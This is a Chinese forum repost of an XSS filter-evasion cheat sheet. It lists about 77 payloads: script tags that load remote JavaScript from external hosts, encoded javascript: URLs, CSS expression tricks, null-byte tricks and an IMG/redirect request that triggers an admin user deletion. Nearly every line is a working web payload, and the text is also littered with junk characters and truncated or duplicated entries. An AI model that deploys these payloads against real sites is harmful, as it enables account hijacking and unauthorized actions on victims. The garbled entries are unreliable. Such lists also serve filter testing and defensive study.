貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。; F' l) Z/ g$ U% S; d) T/ v$ E
(1)普通的XSS JavaScript注入; s# D2 i- Q$ ]6 i( a: t
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; t( l# j2 K1 w+ }8 {& Z* P! a
(2)IMG标签XSS使用JavaScript命令& w j- H9 a9 O: B) k- `
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( D* x2 t- X v @: A(3)IMG标签无分号无引号
4 ?7 v* b- c1 Y( ?. I; \* E' p<IMG SRC=javascript:alert(‘XSS’)>% n' f/ ]/ x# h
(4)IMG标签大小写不敏感
$ [" I* P2 K+ f; q9 b7 e<IMG SRC=JaVaScRiPt:alert(‘XSS’)> u# [( N8 I9 Q; [, e4 V
(5)HTML编码(必须有分号)7 w/ }& I% U; R& b$ K% m' G8 `) }
<IMG SRC=javascript:alert(“XSS”)>
) l5 u& Q* T, W(6)修正缺陷IMG标签
: u, }0 o' T0 U8 \, y, g<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
8 x5 w% I0 t$ L. _. y9 V* l
/ P8 k& w5 b2 w3 ~+ K* V$ D" t
+ s: B0 X& p& `! f/ Z* Z8 i(7)formCharCode标签(计算器)
/ A$ l( n1 T& }<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
5 d* `/ r$ S. v& d5 T(8)UTF-8的Unicode编码(计算器)
- M4 T# M$ h# r N# F; ?<IMG SRC=jav..省略..S')>
! h/ \6 d8 R- P5 @& r% B2 @(9)7位的UTF-8的Unicode编码是没有分号的(计算器), ~) Q7 C m% d" O
<IMG SRC=jav..省略..S')>
! r7 t t( o4 E6 N2 Z3 F- a(10)十六进制编码也是没有分号(计算器)
/ W4 [1 v7 u l( A9 x: [. D5 L<IMG SRC=java..省略..XSS')>
6 ]" W% i) p5 v. `# W) x(11)嵌入式标签,将Javascript分开/ r3 [" w; O. K0 f& v% S
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 z. L/ O9 @0 f: J6 `/ q(12)嵌入式编码标签,将Javascript分开
L: x" _6 f; W0 i' d7 R<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 o! P1 d3 P$ n0 R7 S' g(13)嵌入式换行符
, A D6 N, `' x5 G+ |<IMG SRC=”jav ascript:alert(‘XSS’);”>
) m2 K1 W ^% w" _5 q' O( W(14)嵌入式回车
2 t3 C f3 m' V* ^, w<IMG SRC=”jav ascript:alert(‘XSS’);”>: \- g4 y( U8 ]- s; _+ z' }# u$ b# }' U
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
|: \; c- h7 z/ @7 M2 L<IMG SRC=”javascript:alert(‘XSS‘)”>! y* b% ~% k" Q8 x' W( l: H+ l
(16)解决限制字符(要求同页面)
# Z# A; I- G5 R! C( Y, p$ J) I<script>z=’document.’</script>
3 P5 J/ l+ u5 z9 C, G/ u3 w<script>z=z+’write(“‘</script>4 I0 x* f9 k8 x
<script>z=z+’<script’</script>% T1 {, h l3 a) A0 A5 E8 s" Q
<script>z=z+’ src=ht’</script>
& K8 @% T6 y4 @/ E8 ?: }<script>z=z+’tp://ww’</script>
* a; t3 V& @4 z5 z$ v3 B) [4 ?<script>z=z+’w.shell’</script>" }/ O' S2 b+ G3 w* n
<script>z=z+’.net/1.’</script>
9 P# W% L9 R8 Z<script>z=z+’js></sc’</script>
5 c e+ \! w3 C, n8 j8 k<script>z=z+’ript>”)’</script>+ t: h7 C7 i7 }: j6 c. \
<script>eval_r(z)</script>- w: s' A4 X5 Y/ l. ?3 I# O) @
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
3 P+ K* E; ? ~https://www.t00ls.net/viewthread ... table&tid=15267 2/6
# N' v; ]% F" o2 F+ Kperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out& a( Z8 F" P7 U
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 P. V, I) X. l, H. Y8 S$ Zperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out$ E. w6 @, I( U4 h
(19)Spaces和meta前的IMG标签
9 l. n& n, l1 o/ v" w" q7 S<IMG SRC=” javascript:alert(‘XSS’);”>9 h6 ^) H7 B+ g1 T4 N
(20)Non-alpha-non-digit XSS( E7 R, k& R+ b9 W1 n
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 P3 p# h+ G4 |( ]& w6 l- ?& z(21)Non-alpha-non-digit XSS to 2
: L- S/ E. x/ n<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
4 F+ Y2 }8 m& `# d# n' h2 {(22)Non-alpha-non-digit XSS to 3
. v: ?/ c, X& K<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! M# [5 A4 s/ B: P. q' S* ](23)双开括号
$ I3 z" E# L- o. P0 t i<<SCRIPT>alert(“XSS”);//<</SCRIPT>1 U. L1 n4 R y1 v8 [* w
(24)无结束脚本标记(仅火狐等浏览器)
@. C0 Q# b2 d6 k& v- G<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>' H+ t8 v- n9 ?
(25)无结束脚本标记22 E* ~' G, G- [$ c' A2 `( n/ L2 _4 ~
<SCRIPT SRC=//3w.org/XSS/xss.js>
* D0 K# A: D( K) y0 u" D3 B(26)半开的HTML/JavaScript XSS
K) w( u$ d. \# T<IMG SRC=”javascript:alert(‘XSS’)”. J1 X$ O) b+ d
(27)双开角括号
' X6 R+ [4 K0 u# m& J$ e) x<iframe src=http://3w.org/XSS.html <
3 @' T, Z. J$ W7 x(28)无单引号 双引号 分号6 f4 O3 B1 |# V2 u A# x; q
<SCRIPT>a=/XSS/3 z9 z7 H" d" Y) F1 L+ x
alert(a.source)</SCRIPT>
, i d) G' _5 O: B(29)换码过滤的JavaScript
: r0 C. U$ u$ B% k. d\”;alert(‘XSS’);//
6 s; ]: S; g5 W" f(30)结束Title标签5 j# ^! {3 N- w5 t
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- e* b0 w+ l7 l0 x6 q a(31)Input Image
! f6 @( v3 P7 M( z7 d# C! g$ w3 M<INPUT SRC=”javascript:alert(‘XSS’);”>, ?+ s7 i* g0 F" [
(32)BODY Image0 u; r& {. w5 |+ Y7 V
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ y0 A4 o2 Z8 p8 i(33)BODY标签
* z9 E5 {2 C+ \<BODY(‘XSS’)>
7 v }* H& f( R4 R5 Z(34)IMG Dynsrc
# ?( L M$ ^" m( A( f* w<IMG DYNSRC=”javascript:alert(‘XSS’)”>8 w5 W& \$ b" u# M$ P
(35)IMG Lowsrc
# v( E/ j P7 k1 S( n7 v4 l1 S<IMG LOWSRC=”javascript:alert(‘XSS’)”>
. v+ T5 b1 a$ o Z) h(36)BGSOUND
' I4 |" |: N4 Z' d$ A; N$ b<BGSOUND SRC=”javascript:alert(‘XSS’);”>- T4 A* d5 w7 Q) l0 ?
(37)STYLE sheet
) ^7 d4 m- \7 n, p8 v2 z<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
$ P6 `9 N" t) D5 v2 V/ T(38)远程样式表" \& J6 T3 [; J/ a0 }; R( w
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
, H' q/ o/ ?+ ~8 X(39)List-style-image(列表式)/ w% r2 v( S" t; h# L& h
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS( [" T& G# V( g2 L# Z
(40)IMG VBscript+ g3 s) `4 h& K7 f" q" O5 ?
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
0 s& s, R" g$ T9 u& N" u/ P3 n* O(41)META链接url
: Q; x# y E8 _
5 Y8 o$ }/ Y! Z+ Q, Z/ H" S
1 P- y+ j3 l; K7 v7 ~* g<META HTTP-EQUIV=”refresh” CONTENT=”0;# O+ h3 X# ?' A
URL=http://;URL=javascript:alert(‘XSS’);”>
, v3 g$ \/ K1 E# z; c(42)Iframe
n) V7 ~8 j# \! c/ j7 O, \<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 o5 V- S4 I4 b(43)Frame
7 e& o" Q" J- }9 o<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
' v- D6 M& `- Ihttps://www.t00ls.net/viewthread ... table&tid=15267 3/6 y0 K3 W5 H+ t" d2 t: [- \
(44)Table, w" A$ l7 H9 W5 q
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
6 B3 U5 {- r7 C: G(45)TD5 U& _3 ~& ]" ?3 d
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>$ p, K9 P9 ^/ G+ o: }/ q3 B
(46)DIV background-image1 z2 @' Z; Z1 W; S2 D) B0 t
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
N: X" x2 P+ X(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-" e4 [7 `; p. i! w5 w3 b- S
8&13&12288&65279)5 M% ` @9 N* k0 |, @+ I
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. b6 |3 _$ A0 ?9 K% A* L' l(48)DIV expression
- h; Q( v: w* m' U3 S% T1 `<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
/ z/ c- B9 n! ]0 d$ ~1 c(49)STYLE属性分拆表达0 T4 \. X' \8 v
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>, a6 a" C* l1 Q7 h" l
(50)匿名STYLE(组成:开角号和一个字母开头)( W$ \0 f; {/ F: h5 c) @
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”># P. l6 `; {9 F7 ?/ k2 K3 n2 Y
(51)STYLE background-image
: M/ | {+ v& A# M<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A; q! |2 d+ W5 s" g& T5 P1 @
CLASS=XSS></A>% Z) |: Q" E" c m9 P( c
(52)IMG STYLE方式/ ~$ i$ @0 q% F5 H: X
exppression(alert(“XSS”))’>6 |/ ^7 h7 M4 B% C. \! m; Z
(53)STYLE background
: h5 D( V8 Y" K* d<STYLE><STYLE( \ t$ n- ^! o5 P
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>; P7 V7 y4 I# |) e; F
(54)BASE; k$ J1 F/ R. G. p, z0 D: }
<BASE HREF=”javascript:alert(‘XSS’);//”>5 O/ x( T$ P: S: o
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS# I# S. D* y/ W4 }
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
* t) ?4 j( S6 _- e) ]! O; X& g& P2 x(56)在flash中使用ActionScrpt可以混进你XSS的代码
/ p6 M& G& ^" N; H. D# e3 A! aa=”get”;7 l" U) a" P. X4 s/ k: T
b=”URL(\”";
0 W: N, Z) R% Gc=”javascript:”;
0 o! p0 M& W) I; Sd=”alert(‘XSS’);\”)”;
8 `; P a, [( ueval_r(a+b+c+d);
0 ~% n& z# d7 j(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上2 [! d- t) W, z% V' |+ i+ Q* c
<HTML xmlns:xss>
1 X% P4 Q/ W0 R<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
" o# R9 {- e' U" H+ F% [" w* h; v% M<xss:xss>XSS</xss:xss>4 J' {$ s$ V7 g' J+ \1 N. ]
</HTML>
7 U7 l: E: T& `( F, Z7 R& ^(58)如果过滤了你的JS你可以在图片里添加JS代码来利用" @+ N% l3 {% U) Q8 P
<SCRIPT SRC=””></SCRIPT>! ~) g" \# O5 b3 h0 P2 j
(59)IMG嵌入式命令,可执行任意命令
% ?% H$ S" ?9 E/ n% E" y$ ?<IMG SRC=”http://www.XXX.com/a.php?a=b”>; m8 {+ e3 c. W0 K
(60)IMG嵌入式命令(a.jpg在同服务器)# y; l. ~$ \9 ?, Y" _7 C9 h
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
+ g9 d- b1 ~7 z; B8 m0 `8 J(61)绕符号过滤: `5 B( c8 Y2 V& Q
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
h: D1 O( D# Y9 V(62)
' @, _# q. s# |2 K9 e& A/ X9 r" J<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>& {3 [- ?9 Q R6 @& s {# ~
(63)
2 N; i( R: x$ |: J4 v+ x<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>5 C' r) l2 ?8 O, \9 u! F1 R
(64)
+ x _$ ~; k& M<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
5 i6 G/ q! M1 A" l4 E(65)
5 P, _7 s7 |1 }0 U! X<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT># V/ Y) G6 B0 n# V2 P* w
(66)12-7-1 T00LS - Powered by Discuz! Board
: ^- A/ D( _+ E0 Z& ^https://www.t00ls.net/viewthread ... table&tid=15267 4/6' z1 h- q# V/ \7 D: Y% b
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>! P& }1 C% ~; V; X) V
(67)
: T+ i& {; P; k7 o9 D<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>* h" Z5 F9 ?. S
</SCRIPT>
- n# G- I8 {5 j(68)URL绕行6 r/ L8 ]0 \* C) V; `
<A HREF=”http://127.0.0.1/”>XSS</A>
; x. J5 ^9 W+ M J(69)URL编码, W/ y* R) i: z3 `! t: K
<A HREF=”http://3w.org”>XSS</A>6 ?$ v3 o9 u1 u/ B" g8 B9 Z
(70)IP十进制
0 x* K- q, c4 K @" _( ?, Y<A HREF=”http://3232235521″>XSS</A>
. S5 |+ F9 t6 g" f9 [(71)IP十六进制- ]! w1 {. L) J; } h
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>9 W5 [' _% Z) D# {* h
(72)IP八进制
. A5 `) C' Y( J. \<A HREF=”http://0300.0250.0000.0001″>XSS</A>7 A: c0 x& `0 H
(73)混合编码! o; A: S. I5 F2 k. I1 F& B
<A HREF=”h
) h9 ~0 ?: D x- w4 Ftt p://6 6.000146.0×7.147/”">XSS</A>$ I* d1 T" V9 @. T0 C4 B c
(74)节省[http:]- v2 n% Q$ l0 N0 R, e
<A HREF=”//www.google.com/”>XSS</A>7 H( w5 E6 @2 d* h9 G
(75)节省[www]
; T* P% z% Y3 W: Y# _<A HREF=”http://google.com/”>XSS</A>8 ~- n5 {: V- A! J
(76)绝对点绝对DNS
, i) X1 I, l! }9 Y<A HREF=”http://www.google.com./”>XSS</A>
. _6 K# u( Z0 z: y6 M" c; J(77)javascript链接) I9 C- H. \" q- O! A8 t' v
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>: ?, I- d: x( n4 |9 {% O
+ V, [9 R+ Z4 c3 x" ^1 a
原文地址:http://fuzzexp.org/u/0day/?p=140 `3 G6 w6 M9 z& O& o6 m
/ G3 P+ i2 b3 M3 m; e |
发表于 2013-4-19 19:22:37
收藏
支持
反对